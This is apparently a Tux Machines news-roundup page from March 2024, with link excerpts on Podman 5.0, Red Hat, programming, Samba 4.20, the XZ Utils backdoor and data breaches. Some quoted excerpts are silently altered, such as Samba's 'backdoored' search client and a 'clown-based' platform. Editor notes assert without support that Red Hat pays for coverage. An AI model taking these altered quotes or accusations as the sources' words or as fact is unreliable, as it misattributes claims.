⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡀⣀⠀⠀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⡀⢀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀ ⣤⣶⣶⣶⣶⣶⣶⣶⣶⣶⣾⣿⣿⣿⣿⣿⣿⣿⣿⢏⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣽⣿⣿⣿⣿⣿⣿⣶⣶⣶⣶⣶⣶⣦⣤⣤⣤⣤ ䷩ 𝚕𝚒𝚗𝚎 2358 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Podman_5_0_Release_and_Red_Hat_Puff_Pieces_or_Purchased_Coverag.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Podman_5_0_Release_and_Red_Hat_Puff_Pieces_or_Purchased_Coverag.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Podman 5.0 Release and Red Hat Puff Pieces (or Purchased 'Coverage' in Media)⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ LWN ☛ Managing_Linux_servers_with_Cockpit [Ed: Joe Brockmeier, who came from Red Hat, keeps promoting Red Hat in LWN]⠀⇛ Cockpit is an interesting project for web-based Linux administration that has received relatively little attention over the years. Part of that may be due to the project's strategy of minor releases roughly every two weeks, rather than larger releases with many new features. While the strategy has done little to garner headlines, it has delivered a useful and extensible tool to observe, manage, and troubleshoot Linux servers. * ⚓ Red Hat Official ☛ Podman_5.0_Unveiled⠀⇛ With this release, our efforts were focused on three primary objectives. First, we heavily rewrote the code for Podman machine. Podman machine includes a set of subcommands that manage Podman’s virtual machine, which is necessary for users to be able to run Podman on MacOS or Windows. * ⚓ Red Hat Official ☛ The_business_value_of_Red_Hat_Ansible_Automation Platform [Ed: Red Hat is paying IDC for ads disguised as "studies"]⠀⇛ * ⚓ Red Hat Official ☛ Transforming_Your_Identity_Management⠀⇛ Modern IT systems have a lot of components—components people have to use, and components who need to talk to each other. That’s a lot of traffic and exchanging of sensitive information. How do you sort the legitimate users from the potential intruders? * ⚓ Smaller_models_could_help_AI_move_from_the_cloud_to_edge [Ed: Red Hat is slinging buzzwords to promote hype]⠀⇛ “We’re seeing some of these models are shrinking in size pretty dramatically,” Red Hat’s VP and GM for Edge and In-vehicle Operating Systems Francis Chow told Silverlinings. * ⚓ Silicon Angle ☛ Revolutionizing_platform_engineering:_Customization, community_and_the_future_of_DevOps [Ed: Red Hat sponsored articles about itself, for itself to then Red Hat Official ☛ link_to.]⠀⇛ (* Disclosure: Red Hat Inc. sponsored this segment of theCUBE. Neither Red Hat nor other sponsors have editorial control over content on theCUBE or SiliconANGLE.) ䷩ 𝚕𝚒𝚗𝚎 2432 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Programming_Leftovers.1.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Programming_Leftovers.1.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Programming Leftovers⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ The New Stack ☛ Import_and_Use_a_Third-Party_Package_in_Golang⠀⇛ Like most compiled programming languages, the Go programming language makes it possible to use external libraries and other pre-packaged tools.  * ⚓ Apache_Groovy:_Assertions_for_clearer,_more_reliable_code⠀⇛ Groovy's assert statement verifies code behavior inline. It throws errors with details for debugging and helps write robust, maintainable Groovy code. Learn how assert works and the benefits it offers. * ⚓ Maintainer_Confidential:_Challenges_and_Opportunities_One_Year_On⠀⇛ The big news in the last year for us was finding that we could get some help from the Sovereign Tech Fund (STF), a German government funded initiative that is trying to help projects and the overall open software ecosystem. They read the article and wanted to see if there was a way to work together and help. The project had already been working on a five year plan, basically an open-ended discussion of where we’d like to see the project in five years’ time and what kinds of things might we like to see happen in that time frame. We found that we could take some of the themes from that plan and have financial help to bring them to reality. Funding comes with constraints and it has been a challenge to do things in the time frame needed, but by contracting the work through many of the consultancies working within our ecosystem, we’ve been able to quickly pull together some amazing changes. The projects we targeted were a mix across a spectrum of topics. Some are future looking with things like IDE integration into newer IDEs like VSCode. Some add automated testing to older code like Toaster, meaning we can stop it bit- rotting and degrading and start planning ways to better use it in the future. There was work to improve the developer experience both within our tools such as better understanding why cache objects (“sstate”) weren’t being reused, through to re-enabling patch submission/review processes automated CI- style helpers. There was also work done on properly documenting our security processes and preparing the project for the next generation of SPDX which is key to our Software Bill of Materials (SBoM) support. * ⚓ Red Hat ☛ Packet_capture_using_Network_Observability_eBPF_Agent⠀⇛ Network observability is the ability to easily identify and answer questions about your network in real-time, and use the information to make informed decisions to manage and optimize network resources. To facilitate and dig deeper with more insights into an ongoing network flow in real-time, we present Packet Capture Agent (PCA), an extension to the Network Observability eBPF Agent (netobserv-agent). Historically, network observability data constituted of flow logs. A flow log record captures network flow, essentially layer 4 and 5 data. While this is useful and is extensively used for making network decisions, the question we ask is: can we do better? Is there still information hiding that we have not been able to collect/use for observability? ䷩ 𝚕𝚒𝚗𝚎 2523 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Programming_Leftovers.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Programming_Leftovers.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Programming Leftovers⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ Sebastiaan Andeweg ☛ Chasing_the_casing_in_Vim_|_Seblog⠀⇛ A lot of programming is really just taking data in one form and turning it into another. Imports and exports. Within different contexts, different conventions apply. Within Laravel, database columns are usually snake_case, yet within PHP most variables are camelCased. Within HTML and CSS, things are usually kebab- cased, until you find a React component, which are usually PascalCased. * ⚓ Robin Rendle ☛ The_Other_Side⠀⇛ I used to look at that screenshot of inconsistencies and recoil in terror. I would look at all this and think to myself: Wow! What a bunch of junior designers they must have over there! What a colossal waste! How shameful and inefficient an organization Valve must be if this is the state of their components! I can do better! Haha! But now I kinda think this picture has turned into an opinion that is just as yawn-worthy as hating on Comic Sans. It all seems absurd and ridiculous until you actually start building a font or, in Steam’s case, one of the most successful software products ever made. * ⚓ Jamie Brandon ☛ Notes_on_compiler_IRs⠀⇛ Almost every compiler I've ever looked at uses some kind of control-flow graph, except zig which preserves structured control flow. But! All those compilers had to support languages with irreducible control flow (eg goto in c) and compile to targets that support irreducible control flow (pretty much anything except wasm). Given that I'm compiling a language with reducible control flow (zest) to a target that only allows reducible control flow (wasm), is there any advantage to using a full control-flow graph in the middle? I definitely will need to do SRA to get structs off the shadow stack, but I think that could be done by allowing zig-style blocks to return multiple variables. * ⚓ Frank Delporte ☛ Example_Java_Application_with_Embedded_Jetty_and_a htmx_Website⠀⇛ I was experimenting with a Java application that can act as a web server and includes the user interface HTML-files that get modified with htmx, to replace certain parts of the HTML with other ones created in Java. I found it pretty hard to understand how to configure the embedded Jetty webserver, but as always with Java libraries, it’s pretty easy once you understand how to do it ;-) I decided to share my example, so you don’t need to go through the same search if you want to use the same approach… * ⚓ Caleb Hearth ☛ Using_WidgetKit_+_SwiftData⠀⇛ Yesterday I was setting up my first widget, scratching an itch I’ve had for a while “empty states” in some lock screen widgets and watch complications. I was following a couple of articles by Majid Jabrayilov, which I found really useful in getting some of the boilerplate set up for adding a widget extension to an app. Something those posts don’t touch on is integrating with the main app’s persistent data store, in my case SwiftData. * ⚓ Marce Coll ☛ Explorative_Programming⠀⇛ I am very bad at planning and visualizing what a program should look before I start writing it. I'm sure a lot of other developers are in that boat as well. I'd even venture to say that (almost?) all developers have a hard time doing that even if they think they understand the problem. Well, that's probably actually the root of the issue. Without writing or tackling them, it's hard to understand problems. You can only reach so far by thinking very hard in isolation. In my case the only real way I can tackle a problem is to start writing code and playing with the problem and its data. I can talk about how I approach the process at another time, but I need to explore the problem space to find its limits, its edge cases, what areas are well lit and which are in shadows. I cannot think of this in the abstract. * § R⠀➾ o ⚓ Rlang ☛ Aligning_Beliefs_and_Profession:_Using_R_in_Protecting the_Penobscot_Nation’s_Traditional_Lifeways⠀⇛ o ⚓ Rlang ☛ Mastering_Text_Manipulation_in_R:_A_Guide_to_Using_gsub() for_Multiple_Pattern_Replacement⠀⇛ In the realm of text manipulation in R, the gsub() function stands as a powerful tool, allowing you to replace specific patterns within strings effortlessly. o ⚓ Rlang ☛ Update_vvtableau:_Tableau_Cloud_Support⠀⇛ In our latest update, we’re excited to announce that vvtableau now supports Tableau Cloud, expanding its capabilities beyond Tableau Server to include the clown- based platform. o ⚓ Rlang ☛ Mastering_the_map()_Function_in_R:_A_Comprehensive Guide⠀⇛ In the world of data manipulation and analysis with R, efficiency and simplicity are paramount. One function that epitomizes these qualities is map(). * § Python⠀➾ o ⚓ The Record ☛ Popular_PyPI_site_for_developers_temporarily_blocks functions_due_to_malware_campaign⠀⇛ Administrators for a widely used repository for the Python coding language suspended some functions temporarily overnight because of a “malware upload campaign.” The Python Package Index (PyPI) said it had restored services early Thursday after blocking new project creation and new user registration for about 10 hours. PyPI is a key part of the software supply chain, allowing developers to share and download useful pieces of Python code. o ⚓ Security Week ☛ Malware_Upload_Attack_Hits_PyPI_Repository⠀⇛ The confirmation of the PyPI incident, which has since been resolved, comes as security researchers at Checkmarx warn that multiple malicious Python packages are being pushed via typo-squatting techniques. ䷩ 𝚕𝚒𝚗𝚎 2700 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Red_Hat_Warns_Fedora_Linux_40_41_and_Rawhide_Users_About_Critic.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Red_Hat_Warns_Fedora_Linux_40_41_and_Rawhide_Users_About_Critic.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Red Hat Warns Fedora Linux 40/41 and Rawhide Users About Critical Security Flaw⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Marius Nestor on Mar 29, 2024 🄸🄼🄰🄶🄴_🄳🄴🅂🄲🅁🄸🄿🅃🄸🄾🄽_⦇xz⦈_ It would appear that the upstream tarballs of the XZ Utils 5.6.0 package, which is distributed via GitHub or the project’s official website, included some extra .m4 files that contained instructions for building the software with a version of GNU Automake that did not exist in the repository. During the compilation of the liblzma library, a prebuilt object file is extracted from one of the test archives and used to modify specific functions in XZ Utils’ code. Since the liblzma library is being used by software like sshd, it could be used by a malicious actor to gain remote access to the vulnerable system. Read_on ⠰⠶⠆⢀⣀⡀⠀⢀⡀⠀⠀⠀⠀⣀⣀⣀⡀⠀⠀⠀⡀⠀⠀⠀⠀⠀⣀⣀⣀⣀⣀⣀⣀⣀⣀⠀⠶⠰⠆⣰⣶⣶⣂⣀⡀⠀⣀⣀⣀⣀⣀⣀⣀⣀⡀⢀⣀⣀⣀⣀⡀⢀⠀⠀⠀⠀⣀⣀⠀⠀⠀⠀⣀⠴⠔⠆⠰⠆ ⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠛⣿ ⣿⣏⠭⠭⢭⡭⠭⠍⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠩⠭⡭⠍⠉⠉⠉⠉⠉⠉⠭⠭⠭⠭⠬⠭⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠩⠭⠭⠍⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠉⠩⠭⢽⣿⣿ ⣿⡇⢿⣿⣿⣿⣿⣉⡙⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠨⣽⣿⡅⠀⠀⠀⠀⠀⠀⡭⡯⡭⣭⣭⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠨⣭⣯⢥⢤⣤⣦⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⣾⣭⢽⣿⣿ ⣿⡇⣽⣿⣿⡿⠿⠿⠿⠷⠴⠶⠄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠨⠿⢿⠇⠀⠀⠀⠀⠀⠀⡿⡽⠽⢿⣿⡁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠨⡭⠿⠭⠿⠽⠯⠅⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⢽⣿⣿ ⣿⡇⣿⣟⣿⣏⣁⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⣯⣿⣽⡯⣿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣿⣿⢼⣿⣿ ⣿⡇⣿⣿⣿⣏⣉⣁⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⣿⣿⣿⣿⢽⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⣿⣷⣶⣶⣶⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⢿⣿⣺⣿⣿ ⣿⡗⣚⣻⣓⣲⣒⡞⠓⠒⠒⠒⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢈⣉⣁⡀⠀⠀⠀⠀⠀⠀⣉⣈⣉⣈⣉⣉⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣉⣉⣉⣈⣉⣉⡁⠀⠀⠀⠀⠀⠀⠀⠀⠀⣈⣉⣸⣿⣿ ⣿⡇⣷⣿⣾⣶⣷⣅⣀⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢐⣿⣷⡂⠀⠀⠀⠀⠀⠀⣗⣗⣗⣾⣺⣲⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢐⣟⣷⣖⣺⣲⣾⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⢱⣾⣺⣧⣿ ⣿⡇⣿⣷⣷⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢐⣶⣳⡆⠀⠀⠀⠀⠀⠀⣳⣳⣲⣞⣞⣾⠂⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢐⣒⣶⣒⣲⣲⣗⡆⠀⠀⠀⠀⠀⠀⠀⠀⠐⢻⣺⣺⣟⣿ ⣿⡇⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿⡇⠀⠀⠀⠀⠀⠀⣗⣗⣿⣾⣿⡇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣿⣿⣧⣤⣤⣤⣤⣤⣤⠀⠀⠀⠀⠀⠀⠀⣼⣿⣾⣿⣿ ⣿⡇⣤⣬⣿⣿⠛⠛⠘⠛⠛⠛⠛⠚⠛⠛⠘⠚⠛⠛⠛⠛⠓⠛⠛⠛⠚⠛⢣⣤⣤⠄⠀⠀⠀⠀⠀⠀⢤⡄⠤⡤⢤⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠠⣤⡤⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠤⠤⢸⣿⣿ ⣿⣇⠙⠉⠉⠛⠋⠙⠋⠉⠉⠙⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠋⠁⠀⠀⠀⠀⠀⠀⠛⠉⠋⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠛⠉⢹⣿⣿ ⣿⣯⠽⠯⡯⠿⠯⠿⠭⠿⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⠤⢼⣿⣿ ⣿⡯⠯⠭⠯⠰⠿⠽⠽⠽⠭⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣿⣿ ⣿⣑⡶⣶⡶⣶⢶⣶⣶⠶⠆⠶⠰⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡏⣿ ⣿⢸⣷⣿⣿⣿⣾⣟⣿⣆⣀⣀⣀⢀⣀⣀⣀⣀⣀⣀⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡇⣿ ⣿⢰⣾⣟⣿⣿⣿⣟⣿⣗⣶⣾⣺⣾⣿⣺⣳⣾⣟⡿⣗⣟⣖⣒⡖⠲⠂⠶⠖⠶⠶⠶⠖⠲⠲⠶⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⡇⣿ ⣿⣗⣒⣚⣓⣚⢒⡒⠒⠓⠒⠀⠀⠈⠀⠀⠀⠁⠀⠁⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣇⣿ ⣿⣷⣲⣾⣿⣦⣤⣤⣤⣄⣤⣤⣠⣤⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢸⣟⣿ ䷩ 𝚕𝚒𝚗𝚎 2756 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Samba_4_20_0_Available_for_Download.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Samba_4_20_0_Available_for_Download.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Samba 4.20.0 Available for Download⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ Mailing List Archives ☛ [Announce]_Samba_4.20.0_Available_for Download⠀⇛ * ⚓ LWN ☛ Samba_4.20.0_released⠀⇛ Version 4.20.0 of the Samba Windows interoperability suite has been released. Changes include better support for group-managed service accounts, an experimental Windows search protocol client, support for conditional access control entries, and more. * ⚓ Linuxiac ☛ Samba_4.20_Brings_Enhanced_Security_and_New_Features⠀⇛ Samba 4.20: Now with reduced dependencies, a new backdoored Windows Search Protocol client, crucial security updates, and more. ䷩ 𝚕𝚒𝚗𝚎 2795 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Samba_4_20_Released_Enhancements_for_Seamless_Integration.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Samba_4_20_Released_Enhancements_for_Seamless_Integration.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Samba 4.20 Released: Enhancements for Seamless Integration⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Arindam Giri on Mar 29, 2024 Samba, the popular open-source software suite that provides file, print, and authentication services for SMB/CIFS networks, has announced the release of Samba 4.20.0. This release comes after six months of development and includes several new features and improvements, particularly in the areas of Active Directory (AD) compatibility and new utilities. Read_on ䷩ 𝚕𝚒𝚗𝚎 2822 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Security_Leftovers.1.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Security_Leftovers.1.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Security Leftovers⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ Security_updates_for_Thursday⠀⇛ Security updates have been issued by Fedora (perl-Data-UUID, python-pygments, and thunderbird), Mageia (clojure, grub2, kernel,kmod-xtables-addons,kmod-virtualbox, kernel-linus, nss firefox, nss, python3, python, tcpreplay, and thunderbird), Oracle (nodejs:18), Red Hat (.NET 6.0 and dnsmasq), SUSE (avahi and python39), and Ubuntu (curl, linux-intel-iotg, linux-intel- iotg-5.15, unixodbc, and util-linux). * ⚓ MWL ☛ 39:_I_Carry_A_Grudge⠀⇛ This book won’t be in progress long. I hope. These block lists are distributed via DNS, and are called DNS Block Lists (DNSBL). (You’ll also see Reputation Block Lists, or RBLs, but that term is trademarked.) By refusing all mail from hosts on a reliable block list, you immediately stop the overwhelming majority of spam. * ⚓ Bruce Schneier ☛ Hardware_Vulnerability_in_Apple’s_M-Series_Chips⠀⇛ It’s yet_another hardware side-channel attack: The threat resides in the chips’ data memory- dependent prefetcher, a hardware optimization that predicts the memory addresses of data that running code is likely to access in the near future. By loading the contents into the CPU cache before it’s actually needed, the DMP, as the feature is abbreviated, reduces latency between the main memory and the CPU, a common bottleneck in modern computing. * ⚓ Medevel ☛ RapidScan_is_An_Outstanding_Web_Vulnerability_Scanner_for Pentesters⠀⇛ RapidScan is a free and open-source multi-tool web app vulnerability scanner, that allows pentesters, web developers and ethical hackers looks for bugs, and security issues in any web app. * ⚓ Medevel ☛ Comprehensive_Vulnerability_Detection_with_Safety_CLI⠀⇛ Safety CLI is a Python dependency vulnerability scanner that enhances software supply chain security. It detects packages with known vulnerabilities and malicious packages in various environments, providing clear remediation recommendations. * ⚓ Security Week ☛ Malware_Upload_Attack_Hits_PyPI_Repository⠀⇛ Maintainers of the Python Package Index (PyPI) repository were forced to suspend new project creation and new user registration to mitigate a malware upload campaign. * ⚓ Security Week ☛ Cyberespionage_Campaign_Targets_Government,_Energy Entities_in_India⠀⇛ Threat intelligence firm EclecticIQ documents the delivery of malware phishing lures to government and private energy organizations in India. ䷩ 𝚕𝚒𝚗𝚎 2914 ╒═══════════════════ 𝐀𝐑𝐓𝐈𝐂𝐋𝐄 ═════════════════════════════════════════════════╕ (ℹ) Images, hyperlinks and comments at https://news.tuxmachines.org/n/2024/03/29/Security_Leftovers.shtml Gemini version at gemini://gemini.tuxmachines.org/n/2024/03/29/Security_Leftovers.gmi ⠀⌧ █▇▆▅▄▃▂▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁ Security Leftovers⠀▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▁▂▃▄▅▆▇█ ⌧ posted by Roy Schestowitz on Mar 29, 2024 * ⚓ SANS ☛ Scans_for_Apache_OfBiz,_(Wed,_Mar_27th)⠀⇛ * ⚓ Scoop News Group ☛ Spyware_and_zero-day_exploits_increasingly_go_hand- in-hand,_researchers_find⠀⇛ Researchers found 97 zero-days exploited in the wild in 2023; nearly two thirds of mobile and browser flaws were used by spyware firms. * ⚓ Netcraft ☛ Out_of_the_shadows_–_’darcula’_iMessage_and_RCS_smishing attacks_target_USPS_and_global_postal_services⠀⇛ Chinese-language Phishing-as-a-Service platform ‘darcula’ targets organizations in 100+ countries with sophisticated techniques using more than 20,000 phishing domains   ‘darcula’ [sic] is a new, sophisticated Phishing-as-a-Service (PhaaS) platform used on more than 20,000 phishing domains that provide cyber criminals with easy access to branded phishing campaigns. Rather than the more_typical_PHP, the platform uses many of the same tools employed by high-tech startups, including JavaScript, React, Docker, and Harbor.   * ⚓ Security Week ☛ VPN_Apps_on_Surveillance_Giant_Google_Play_Turn_Android Devices_Into_Proxies⠀⇛ Human Security identifies 28 VPN applications for Android and an SDK that turn devices into proxies. * ⚓ Grassley,_Wyden_Probe_Data_Breach_that_Exposed_1.5_Million_Organ Transplant_Patients’_Sensitive_Data⠀⇛ Sens. Chuck Grassley (R-Iowa) and Ron Wyden (D-Ore.) are holding the United Network for Organ Sharing (UNOS) accountable after a data breach allowed UNOS system users unauthorized access to over a million sensitive patient records. This technology breakdown is the latest in a string of failures at UNOS, which for 40 years has held the sole government contract to manage the U.S. organ transplant system. Grassley and Wyden, the former and current chairmen, respectively, of the Senate Finance Committee, last year authored a historic law that breaks up the organ transplant contract and encourages the most competent contractors in the field to manage the nation’s organ system. “Whether the exposed data was accessed by authorized users only or not, this mishandling error is another example of UNOS’s failure to operate the critical technology supporting the OPTN,” the senators wrote.“Given the large amount of sensitive data UNOS stores and collects on past and present patients, it is imperative that data breaches do not happen again.” * ⚓ Pakistan ☛ Data_theft:_Nadra_initiates_action,_suspends_8_officers⠀⇛ The National Database and Registration Authority (Nadra) has initiated disciplinary action against several of its officers with eight already suspended and charged, while over a dozen now likely to be penalised, The News reported on Thursday. According to the publication, action has begun against Nadra staffers including three officials from the government body's senior management — director general (DG) technical, DG network Karachi — and others. * ⚓ Personal_data_of_2.7_million_Pakistanis_‘stolen’_from_government records,_probe_finds⠀⇛ An investigation has revealed that personal information of more than 2.7 million Pakistanis has been “stolen” from the records of a government-run body that regulates the database of citizens. A government official said on Wednesday that a team was formed to probe the data leak from the National Database and Registration Authority (Nadra) office. The report indicated “that data of more than 2.7 million Pakistanis has been compromised from Nadra’s records between 2019 and 2023,” an interior ministry official told EFE on Wednesday on condition of anonymity. * ⚓ 